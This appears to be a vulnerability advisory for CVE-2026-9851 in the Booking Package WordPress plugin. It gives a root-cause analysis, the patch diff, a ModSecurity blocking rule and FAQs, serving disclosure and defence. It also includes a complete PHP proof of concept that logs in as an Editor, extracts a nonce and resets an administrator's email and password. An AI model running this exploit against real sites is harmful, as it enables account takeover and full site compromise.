What is CVE-2026-9851?

CVE-2026-9851 is a high-severity privilege escalation vulnerability in the Booking Package plugin for WordPress, affecting versions up to 1.7.16. It allows authenticated users with Editor-level access or higher to change the email address and password of any WordPress user, including Administrators, through a flawed AJAX action.

How does this vulnerability work?

The vulnerability arises from a missing capability check in the ‘updateUser’ AJAX endpoint. Attackers can craft a request that bypasses owner restrictions, allowing them to modify user credentials using attacker-supplied input, leading to full site takeover.

Who is affected by CVE-2026-9851?

Any WordPress site using the Booking Package plugin version 1.7.16 or earlier is vulnerable. Administrators should check their plugin version and update if necessary to ensure protection against this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Booking Package plugin installed. If it is version 1.7.16 or earlier, your site is at risk and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the Booking Package plugin to version 1.7.17 or later. This version includes critical security patches that address the privilege escalation flaw.

What does a CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the affected system, warranting immediate attention and remediation.

What practical risks does this vulnerability pose?

If exploited, this vulnerability allows attackers to gain full control of a WordPress site. They can change user credentials, install malicious plugins, and modify site content, leading to a complete compromise of the site.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by sending a specially crafted POST request to the vulnerable AJAX endpoint. It shows the steps required to log in as an attacker and modify the target user’s credentials.

How can I protect my WordPress site from similar vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, use strong passwords, implement user role restrictions, and conduct security audits. Additionally, consider using security plugins that monitor for vulnerabilities.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all passwords, check user accounts for unauthorized changes, and restore from a clean backup if necessary. Additionally, conduct a thorough security audit to identify and remediate any vulnerabilities.

Are there any additional resources for understanding this vulnerability?

For more information, consult the official CVE database, security blogs, and WordPress security forums. Additionally, consider using vulnerability scanning tools to identify potential risks in your WordPress installation.

How can I report vulnerabilities I discover?

If you discover a vulnerability, report it responsibly to the plugin developer or maintainers. Many organizations have a process for handling security disclosures, and responsible reporting helps improve overall security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-9851: Booking Package <= 1.7.16 Authenticated (Editor+) Privilege Escalation via Account Takeover to updateUser AJAX Action PoC, Patch Analysis & Rule

CVE ID CVE-2026-9851

Plugin booking-package

Severity High (CVSS 7.2)

CWE 639

Vulnerable Version 1.7.16

Patched Version 1.7.17

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9851: This vulnerability permits authenticated attackers with Editor-level access to escalate privileges to Administrator via account takeover in the Booking Package plugin for WordPress versions up to 1.7.16. The flaw exists in the package_app_action AJAX endpoint’s ‘updateUser’ branch, where capability checks are absent. The CVSS score is 7.2, indicating high severity.

The root cause lies in the dispatcher logic for the package_app_action AJAX action. When the mode parameter is set to ‘updateUser’, the handler calls Schedule::updateUser() with the $administrator argument hard-coded to 1 (a privileged value). Inside Schedule::updateUser() (lib/Schedule.php, line 809+), the only owner restriction check (line 831) compared the current user’s login against the POSTed ‘user_login’ parameter. Due to the hard-coded $administrator=1 from the dispatcher, this owner check was bypassed entirely. The function then proceeded to call wp_update_user() with attacker-supplied parameters from $_POST, including ‘user_email’ and ‘user_pass’, which were not sanitized or validated before being passed to the core WordPress function. No capability check (e.g., current_user_can()) was performed before entering the function or before executing the update.

Exploitation requires an authenticated session with Editor-level privileges or higher. The attacker crafts a POST request to /wp-admin/admin-ajax.php with the action parameter set to package_app_action and mode set to updateUser. The request must also include a valid nonce (which is checked by the dispatcher). The critical payload includes the target account’s username in the user_login parameter and a new email and password in user_email and user_pass. Because the nonce is validated but the function lacks authorization checks, the attacker can modify any user’s credentials, including those of an Administrator. This allows the attacker to change the Administrator’s email and password, enabling a full login takeover.

The patch introduces multiple fixes. First, it adds a capability check at the beginning of the selectedMode() function in index.php (line 4437), which returns an error if the user is not logged in or lacks required permissions (edit_others_posts, booking_package_manager, booking_package_editor). This blocks the entire AJAX endpoint for unauthorized users. Second, inside Schedule::updateUser() (lib/Schedule.php, line 809+), the patch adds an authorization layer: it checks if the user is logged in, then verifies that if the target user is an Administrator, the current user must also be an Administrator. It also adds a check ensuring the current user is either the same as the target user or has the ‘edit_users’ capability. The hard-coded $administrator bypass is thus mitigated by these proper authorization checks.

Successful exploitation results in full privilege escalation and site takeover. An Editor-level attacker can change the email address and password of any WordPress user, including the site Administrator. This gives the attacker complete control over the WordPress installation, allowing them to install malicious plugins, modify content, and potentially execute arbitrary PHP code, leading to a complete compromise of the affected site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/booking-package/index.php
+++ b/booking-package/index.php
@@ -3,7 +3,7 @@
 Plugin Name: Booking Package
 Plugin URI:  https://saasproject.net/plans/
 Description: Booking Package is a high-performance booking calendar system that anyone can easily use.
-Version:     1.7.16
+Version:     1.7.17
 Author:      SAASPROJECT Booking Package
 Author URI:  https://saasproject.net/
 License:     GPL2
@@ -255,6 +255,8 @@
 			add_filter('login_headerurl', array($this, 'login_headerurl'));
 			add_filter('login_headertext', array($this, 'login_headertext'));
 			add_action('wp_print_footer_scripts', array($this, 'add_footer_scripts'), 5);
+			add_action('admin_post_booking-package-activate-subscription', array($this, 'activatePaidSubscription'));
+			add_action('admin_post_nopriv_booking-package-activate-subscription', array($this, 'activatePaidSubscription'));

 			if (is_admin() === false) {

@@ -333,12 +335,6 @@

 			}

-			if (isset($_POST['mode']) && $_POST['mode'] == 'booking-package-activate-subscription') {
-
-				add_action('init', array($this, 'activatePaidSubscription'));
-
-			}
-
 			if (isset($_GET['mode']) && isset($_GET['unique']) && $_GET['mode'] == 'booking-package-update-paid-subscription') {

 				add_action('init', array($this, 'updatePaidSubscription'));
@@ -2151,6 +2147,19 @@
 					'booking-package-script-Booking_app-js' =>  plugin_dir_url( __FILE__ ) . 'js/Booking_app.js' . '?ver=' . $this->plugin_version . '&date=' . $pluginDate,
 					'booking-package-script-Reservation_manage-js' =>  plugin_dir_url( __FILE__ ) . 'js/Reservation_manage.js' . '?ver=' . $this->plugin_version . '&date=' . $pluginDate,
 				);
+				/**
+				$files = array(
+					'booking-package-script-Error-js' => plugin_dir_url( __FILE__ ) . 'js/Error.js' . '?ver=' . $this->get_plugin_asset_version('js/Error.js'),
+					'booking-package-script-i18n-js' =>  plugin_dir_url( __FILE__ ) . 'js/i18n.js' . '?ver=' . $this->get_plugin_asset_version('js/i18n.js'),
+					'booking-package-script-XMLHttp-js' =>  plugin_dir_url( __FILE__ ) . 'js/XMLHttp.js' . '?ver=' . $this->get_plugin_asset_version('js/XMLHttp.js'),
+					'booking-package-script-Input-js' =>  plugin_dir_url( __FILE__ ) . 'js/Input.js' . '?ver=' . $this->get_plugin_asset_version('js/Input.js'),
+					'booking-package-script-Calendar-js' =>  plugin_dir_url( __FILE__ ) . 'js/Calendar.js' . '?ver=' . $this->get_plugin_asset_version('js/Calendar.js'),
+					'booking-package-script-Hotel-js' =>  plugin_dir_url( __FILE__ ) . 'js/Hotel.js' . '?ver=' . $this->get_plugin_asset_version('js/Hotel.js'),
+					'booking-package-script-Member-js' =>  plugin_dir_url( __FILE__ ) . 'js/Member.js' . '?ver=' . $this->get_plugin_asset_version('js/Member.js'),
+					'booking-package-script-Booking_app-js' =>  plugin_dir_url( __FILE__ ) . 'js/Booking_app.js' . '?ver=' . $this->get_plugin_asset_version('js/Booking_app.js'),
+					'booking-package-script-Reservation_manage-js' =>  plugin_dir_url( __FILE__ ) . 'js/Reservation_manage.js' . '?ver=' . $this->get_plugin_asset_version('js/Reservation_manage.js'),
+				);
+				**/

 				if ($this->front_end_js === true) {

@@ -4428,7 +4437,12 @@

 		public function selectedMode(){

-			$response = array('status' => 'error', 'mode' => $_POST['mode']);
+			$response = array('status' => 'error', 'mode' => sanitize_text_field($_POST['mode']) );
+			if (is_user_logged_in() === false || (current_user_can('edit_others_posts') === false && current_user_can('booking_package_manager') === false && current_user_can('booking_package_editor') === false) ) {
+
+				return $response;
+
+			}

 			$setting = $this->setting;

@@ -5283,10 +5297,14 @@

 		public function activatePaidSubscription() {

-			$setting = $this->setting;
-			$setting->lookingForSubscription( sanitize_text_field($_POST['customer_id_for_subscriptions']), sanitize_text_field($_POST['subscriptions_id_for_subscriptions']) );
-			header('Location: ' . admin_url("admin.php?page=" . $this->plugin_name . "_setting_page" . "&tab=subscriptionLink"));
-			die();
+			if (isset($_POST['mode']) && $_POST['mode'] == 'booking-package-activate-subscription' && isset($_POST['customer_id_for_subscriptions']) && isset($_POST['subscriptions_id_for_subscriptions'])) {
+
+				$setting = $this->setting;
+				$setting->lookingForSubscription( sanitize_text_field($_POST['customer_id_for_subscriptions']), sanitize_text_field($_POST['subscriptions_id_for_subscriptions']) );
+				header('Location: ' . admin_url("admin.php?page=" . $this->plugin_name . "_setting_page" . "&tab=subscriptionLink"));
+				die();
+
+			}

 		}

--- a/booking-package/lib/CreditCard.php
+++ b/booking-package/lib/CreditCard.php
@@ -13,6 +13,8 @@

         public $prefix = null;

+        public $request_timeout = 30;
+
         public function __construct($pluginName, $prefix){

             $this->pluginName = $pluginName;
@@ -64,6 +66,7 @@

             $args = array(
 				'method' => 'POST',
+				'timeout' => $this->request_timeout,
 				'body' => $params,
 				'headers' => array(
 					'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -108,6 +111,7 @@

 	        $args = array(
 				'method' => 'GET',
+				'timeout' => $this->request_timeout,
 				'headers' => array(
 					'Authorization' => 'Basic ' . base64_encode($secret . ':')
 				)
@@ -158,6 +162,7 @@

 	        $args = array(
 				'method' => 'POST',
+				'timeout' => $this->request_timeout,
 				'body' => $params,
 				'headers' => array(
 					'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -202,6 +207,7 @@

                 $args = array(
                     'method' => 'GET',
+                    'timeout' => $this->request_timeout,
                     'headers' => array(
                         'Authorization' => 'Basic ' . base64_encode($secret . ':')
                     )
@@ -247,6 +253,7 @@

 	            $args = array(
                     'method' => 'DELETE',
+                    'timeout' => $this->request_timeout,
                     'headers' => array(
                         'Authorization' => 'Basic ' . base64_encode($secret . ':')
                     )
@@ -276,6 +283,7 @@

                         $args = array(
                             'method' => 'DELETE',
+                            'timeout' => $this->request_timeout,
                             'headers' => array(
                                 'Authorization' => 'Basic ' . base64_encode($secret . ':')
                             )
@@ -401,6 +409,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -424,6 +433,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => http_build_query($params),
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -446,6 +456,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -477,6 +488,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -497,6 +509,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -515,6 +528,7 @@
             $params = array();
             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 /**'body' => $params, **/
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -551,6 +565,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -696,6 +711,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params,
                 'headers' => array(
                     'Authorization' => 'Basic ' . base64_encode($public_key . ':' . $secret)
@@ -741,6 +757,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'headers' => array(
                     'content-type' => 'application/json',
                     'Authorization' => 'Bearer ' . $token
@@ -793,6 +810,7 @@

             $args = array(
                 'method' => 'PATCH',
+                'timeout' => $this->request_timeout,
                 'body' => json_encode($params),
                 'headers' => array(
                     'content-type' => 'application/json',
@@ -840,6 +858,7 @@

             $args = array(
                 'method' => 'GET',
+                'timeout' => $this->request_timeout,
                 'headers' => array(
                     'content-type' => 'application/json',
                     'Authorization' => 'Bearer ' . $token
@@ -885,6 +904,7 @@

             $args = array(
                 'method' => 'PATCH',
+                'timeout' => $this->request_timeout,
                 'body' => json_encode($params),
                 'headers' => array(
                     'content-type' => 'application/json',
@@ -934,6 +954,7 @@

             $args = array(
                 'method' => 'GET',
+                'timeout' => $this->request_timeout,
                 'headers' => array(
                     'content-type' => 'application/json',
                     'Authorization' => 'Bearer ' . $token
@@ -967,6 +988,7 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     /**'body' => json_encode($params),**/
                     'headers' => array(
                         'content-type' => 'application/json',
@@ -1017,6 +1039,7 @@

                 $args = array(
                     'method' => 'GET',
+                    'timeout' => $this->request_timeout,
                     /** 'body' => $params, **/
                     'headers' => array(
                         'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -1061,6 +1084,7 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     /** 'body' => $params, **/
                     'headers' => array(
                         'Authorization' => 'Basic ' . base64_encode($secret . ':')
@@ -1089,6 +1113,7 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     'body' => $params,
                     'headers' => array(
                         'Authorization' => 'Basic ' . base64_encode($secret . ':')
--- a/booking-package/lib/Schedule.php
+++ b/booking-package/lib/Schedule.php
@@ -31,6 +31,8 @@

         public $payWithPayPay = 0;

+        public $request_timeout = 30;
+
         public function __construct($prefix, $pluginName, $currencies, $userRoleName = 'booking_package_user'){

             global $wpdb;
@@ -569,8 +571,21 @@
 		}

         public function createUser($administrator = 0, $accountKey = null) {
+
+        	if (intval($administrator) === 1) {
+
+				if (is_user_logged_in() === false || ( current_user_can('edit_users') === false && current_user_can('booking_package_manager') === false && current_user_can('booking_package_editor') === false) ) {
+
+					return array(
+						'status' => 'error',
+						'error_messages' => 'Permission denied: You do not have authorization to create a user.'
+					);
+
+				}
+
+			}

-			if ($administrator == 0) {
+			if (intval($administrator) === 0) {

 				if (!isset($_POST['googleReCaptchaToken'])) {

@@ -626,14 +641,15 @@

 			}

-
+			$s_user_login = sanitize_user($_POST['user_login']);
+			$s_user_email = sanitize_email($_POST['user_email']);
 			$response = array("status" => "success", "activation" => $activation);
-			#$user_login = username_exists($_POST['user_login']);
+			#$user_login = username_exists($s_user_login);
 			$user_pass = trim($_POST['user_pass']);
 			$userdata = array(
-				'user_login' => $_POST['user_login'],
+				'user_login' => sanitize_user($s_user_login),
 				'user_pass' => $user_pass,
-				'user_email' => $_POST['user_email'],
+				'user_email' => $s_user_email,
 				'role' => $this->userRoleName,
 			);

@@ -663,17 +679,17 @@
 				}

 				update_user_meta($user_id, 'show_admin_bar_front', 'false');
-				$hash = wp_hash(sanitize_text_field($_POST['user_email']).sanitize_text_field($_POST['user_login']).date('U'));
+				$hash = wp_hash(sanitize_text_field($s_user_email).sanitize_text_field($s_user_login).date('U'));
 				$response['user_id'] = $user_id;
-				$response['user_login'] = esc_html($_POST['user_login']);
-				$response['user_email'] = esc_html($_POST['user_email']);
+				$response['user_login'] = esc_html($s_user_login);
+				$response['user_email'] = esc_html($s_user_email);
 				$response['profile'] = $customUserFields;
-				$this->add_user($user_id, $_POST['user_login'], $_POST['user_email'], $activation, $hash);
+				$this->add_user($user_id, $s_user_login, $s_user_email, $activation, $hash);

 				if ($activation == 1) {

 					$userdata = array(
-						'user_login' => $_POST['user_login'],
+						'user_login' => $s_user_login,
 						'user_password' => $user_pass,
 						'remember' => true
 					);
@@ -693,22 +709,11 @@

 				} else {

-					$uri = $_POST['permalink']."?mode=activation&k=".$hash."&u=".sanitize_text_field($_POST['user_login']);
+					$uri = $_POST['permalink'] . "?mode=activation&k=" . $hash . "&u=" . $s_user_login;
 					$subject = get_option($this->prefix."subject_email_for_member", "No title");
 					$body = get_option($this->prefix."body_email_for_member", "No message");
-					/**
-					if (preg_match('/([activation_url])/', $body, $matches)) {
-
-						$body = preg_replace('/([activation_url])/', $uri, $body);
-
-					} else {
-
-						$body = $uri."n".$body;
-
-					}
-					**/
 					$body = str_replace('[activation_url]', $uri, $body);
-					$this->sendMail(sanitize_text_field($_POST['user_email']), $subject, $body, 'text', $accountKey);
+					$this->sendMail($s_user_email, $subject, $body, 'text', $accountKey);

 				}

@@ -809,23 +814,42 @@
 			$response = array("status" => "error");
 			$userId = 0;

-			$currentUser = wp_get_current_user();
-			if ($administrator === 0 && $currentUser->user_login !== sanitize_text_field($_POST['user_login'])) {
+			if (is_user_logged_in() === false) {

-				$response['error_messages'] = 'Error';
+				$response['error_messages'] = 'Unauthorized: You must be logged in.';
 				return $response;

 			}

+			$currentUser = wp_get_current_user();
 			$user = get_user_by('login', sanitize_text_field($_POST['user_login']));
 			if ($user === false) {

 				return $response;

-			} else {
+			}
+
+			$userId = $user->ID;
+			$userOldEmail = $user->user_email;
+
+			if ( user_can( $userId, 'manage_options' ) && current_user_can( 'manage_options' ) === false ) {
+
+                $response['error_messages'] = 'Permission denied: You cannot edit an administrator account.';
+                return $response;
+
+            }
+
+			if ($currentUser->ID !== $userId && current_user_can('edit_users') === false) {

-				$userId = $user->ID;
-				$userOldEmail = $user->user_email;
+				$response['error_messages'] = 'Permission denied: You cannot edit this user.';
+				return $response;
+
+			}
+
+			if ($administrator === 0 && $currentUser->user_login !== sanitize_text_field($_POST['user_login'])) {
+
+				$response['error_messages'] = 'Error';
+				return $response;

 			}

@@ -849,7 +873,7 @@
 				$userdata = array('ID' => $userId);
 				if (isset($_POST['user_email'])) {

-					$userdata['user_email'] = $_POST['user_email'];
+					$userdata['user_email'] = sanitize_text_field($_POST['user_email']);
 					$hash = wp_hash(sanitize_text_field($_POST['user_email']) . sanitize_text_field($_POST['user_login']) . date('U'));

 				} else {
@@ -1800,15 +1824,25 @@
 			require_once( ABSPATH.'wp-admin/includes/user.php' );
 			$reality = false;
 			$userId = 0;
+
+			if (is_user_logged_in() === false) {
+
+				$response['error_messages'] = 'Unauthorized: You must be logged in.';
+				return $response;
+
+			}
+
+			$currentUser = wp_get_current_user();
+
 			if (intval($administrator) == 1) {

 				$user = get_user_by('login', sanitize_text_field($_POST['user_login']));
 				if ($user !== false) {

 					$reality = true;
+					$userId = $user->ID;

 				}
-				$userId = $user->ID;

 			} else {

@@ -1821,6 +1855,22 @@

 			}

+
+			if (user_can( $userId, 'manage_options' ) && current_user_can( 'manage_options' ) === false) {
+
+				$response['error_messages'] = 'Permission denied: You cannot delete an administrator account.';
+				return $response;
+
+			}
+
+			if ($currentUser->ID !== $userId && current_user_can( 'delete_users' ) === false) {
+
+				$response['error_messages'] = 'Permission denied: You cannot delete this user.';
+				return $response;
+
+			}
+
+
 			if ($reality === true) {

 				$response = array("status" => "success", "userId" => $userId);
@@ -2116,6 +2166,7 @@
     			$product = $products[$index];
 				$args = array(
 					'method' => 'GET',
+					'timeout' => $this->request_timeout,
 					'headers' => array(
 						'Authorization' => 'Basic ' . base64_encode($secret . ':')
 					)
@@ -9380,6 +9431,7 @@
 			$secretKey = get_option($this->prefix . "hCaptcha_Secret_key", "0");
 			$args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => array(
                 	'secret' => $secretKey,
                 	'response' => $token
@@ -9472,6 +9524,7 @@

 	        $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $event,
             );
             $json = wp_remote_request('https://recaptchaenterprise.googleapis.com/v1/projects/' . $projectId . '/assessments?key=' . $apiKey, $args);
@@ -9528,6 +9581,7 @@

 			$args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => array(
                 	'secret' => $secretKey,
                 	'response' => $googleReCaptchaToken
@@ -14812,6 +14866,7 @@
 						);
 						$args = array(
 							'method' => 'POST',
+							'timeout' => $this->request_timeout,
 							'body' => json_encode($params),
 							'headers' => array(
 								'content-type' => 'application/json',
@@ -14876,6 +14931,7 @@

 						$args = array(
 							'method' => 'POST',
+							'timeout' => $this->request_timeout,
 							'body' => $params,
 							'headers' => array(
 								'Authorization' => 'Basic ' . base64_encode($twilio_sid . ':' . $twilio_token)
@@ -14982,6 +15038,7 @@

 				$args = array(
 					'method' => 'POST',
+					'timeout' => $this->request_timeout,
 					'body' => $params,
 					'headers' => array(
 						'Authorization' => 'Basic ' . base64_encode('api:' . $mailgun_api_key)
@@ -15087,6 +15144,7 @@

 					$args = array(
 	                    'method' => 'POST',
+	                    'timeout' => $this->request_timeout,
 	                    'body' => $params
 	                );
 	                $response = wp_remote_request("https://saasproject.net/lib/scriptError.php", $args);
--- a/booking-package/lib/Setting.php
+++ b/booking-package/lib/Setting.php
@@ -13,6 +13,8 @@

         private $isExtensionsValid = null;

+        public $request_timeout = 30;
+
         public $guestForDayOfTheWeekRates = 1;

         public $messagingApp = 0;
@@ -6293,6 +6295,7 @@

             $license = array(
                 'status' => 0,
+                'subscription_status' => '',
                 'customer_id' => trim(esc_html($customer_id)),
                 'subscription_id' => trim(esc_html($subscription_id)),
                 'url' => get_site_url(),
@@ -6301,6 +6304,7 @@

             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => array(
                     'mode' => 'error',
                     'subscription_mode' => 'lookingForSubscription',
@@ -6317,6 +6321,13 @@

                 unset($response['status']);
                 $license['status'] = 1;
+                if (isset($response['subscription_status']) === true) {
+
+                    $license['subscription_status'] = $response['subscription_status'];
+
+                }
+
+
                 $this->updateSubscribeSite();
                 foreach ((array) $response as $key => $value) {

@@ -6343,20 +6354,18 @@
                     }

                 }
-                $this->updateSubscriptionStatus('Active');

-                /**
-                $numberOfVerificationAttemptsForExpiration = get_option('_' . $this->prefix . 'numberOfVerificationAttemptsForExpiration', null);
-                if ( is_null($numberOfVerificationAttemptsForExpiration) ) {
+                if ($this->getSubscriptionStatus() !== 'Canceled') {

-                    add_option('_' . $this->prefix . 'numberOfVerificationAttemptsForExpiration', 0, '', 'no');
+                    $this->updateSubscriptionStatus('Active');

-                } else {
+                }
+
+                if (strtolower( $license['subscription_status'] ) === 'canceled') {

-                    update_option('_' . $this->prefix . 'numberOfVerificationAttemptsForExpiration', 0);
+                    $this->updateSubscriptionStatus('Canceled');

                 }
-                **/

             } else {

@@ -6457,8 +6466,10 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     'body' => $params
                 );
+
                 $response = wp_remote_request(BOOKING_PACKAGE_EXTENSION_URL . "cancelSubscription/", $args);
                 $statusCode = wp_remote_retrieve_response_code($response);
                 $response = json_decode(wp_remote_retrieve_body($response), true);
@@ -6470,6 +6481,7 @@

                 }

+
             }

             return $response;
@@ -6560,6 +6572,7 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     'body' => $params
                 );
                 $response = wp_remote_request($url . "checkLatestInvoice/", $args);
@@ -6867,6 +6880,7 @@

                 $args = array(
                     'method' => 'POST',
+                    'timeout' => $this->request_timeout,
                     'body' => $params
                 );
                 $response = wp_remote_request($url . "updateLicense/", $args);
@@ -6910,14 +6924,6 @@

             }

-            /**
-            if ($this->getSubscriptionStatus() !== 'Canceled' && intval($statusCode) == 200) {
-
-                $this->updateSubscriptionStatus('Active');
-
-            }
-            **/
-
             return true;

         }
@@ -7001,6 +7007,7 @@
             );
             $args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params
             );
             $response = wp_remote_request(BOOKING_PACKAGE_EXTENSION_URL . "cancelAtPeriodEnd/", $args);
@@ -7423,6 +7430,7 @@

 			$args = array(
                 'method' => 'POST',
+                'timeout' => $this->request_timeout,
                 'body' => $params
             );
             $response = wp_remote_request($url . "activation/", $args);

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-admin/admin-ajax.php" 
  "id:20260001,phase:2,deny,status:403,chain,msg:'CVE-2026-9851 via Booking Package AJAX updateUser',severity:'CRITICAL',tag:'CVE-2026-9851'"
  SecRule ARGS_POST:action "@streq package_app_action" "chain"
    SecRule ARGS_POST:mode "@streq updateUser" "chain"
      SecRule ARGS_POST:user_login "@rx .+" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-9851 - Booking Package <= 1.7.16 - Authenticated (Editor+) Privilege Escalation via Account Takeover to updateUser AJAX Action

$target_url = 'http://example.com'; // CHANGE THIS TO TARGET SITE
$admin_username = 'target_admin'; // CHANGE THIS TO TARGET ADMIN USERNAME
$new_email = 'attacker@example.com'; // CHANGE THIS TO NEW EMAIL FOR TARGET
$new_password = 'NewP@ssw0rd!'; // CHANGE THIS TO NEW PASSWORD FOR TARGET

// Attacker credentials (must have Editor+ role)
$attacker_user = 'attacker_editor';
$attacker_pass = 'attacker_password';

// Step 1: Login as attacker to get authenticated session cookie and nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $attacker_user,
    'pwd' => $attacker_pass,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

if (curl_error($ch)) {
    die('Login error: ' . curl_error($ch));
}

// Extract nonce from admin page (find a valid nonce for the plugin)
$admin_url = $target_url . '/wp-admin/admin.php?page=booking-package_setting_page';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$admin_page = curl_exec($ch);

// Simple regex to find a nonce for the plugin actions
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/i', $admin_page, $matches);
if (!isset($matches[1])) {
    die('Could not extract nonce. Manual extraction may be needed.');
}
$nonce = $matches[1];

echo "[*] Nonce extracted: " . $nonce . "n";

// Step 2: Send the privilege escalation payload
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = array(
    'action' => 'package_app_action',
    'mode' => 'updateUser',
    '_wpnonce' => $nonce,
    'user_login' => $admin_username,
    'user_email' => $new_email,
    'user_pass' => $new_password
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$exploit_response = curl_exec($ch);

if (curl_error($ch)) {
    die('Exploit request error: ' . curl_error($ch));
}

$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] HTTP Response Code: " . $http_code . "n";
echo "[*] Response Body: " . $exploit_response . "n";

// Check for success indication
if (strpos($exploit_response, '"status":"success"') !== false) {
    echo "[+] Exploit successful! Administrator account has been taken over.n";
    echo "[+] New credentials for " . $admin_username . ":n";
    echo "    Email: " . $new_email . "n";
    echo "    Password: " . $new_password . "n";
} else {
    echo "[-] Exploit may have failed. Check response above for details.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-9851?
Overview of the vulnerability
CVE-2026-9851 is a high-severity privilege escalation vulnerability in the Booking Package plugin for WordPress, affecting versions up to 1.7.16. It allows authenticated users with Editor-level access or higher to change the email address and password of any WordPress user, including Administrators, through a flawed AJAX action.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the ‘updateUser’ AJAX endpoint. Attackers can craft a request that bypasses owner restrictions, allowing them to modify user credentials using attacker-supplied input, leading to full site takeover.
Who is affected by CVE-2026-9851?
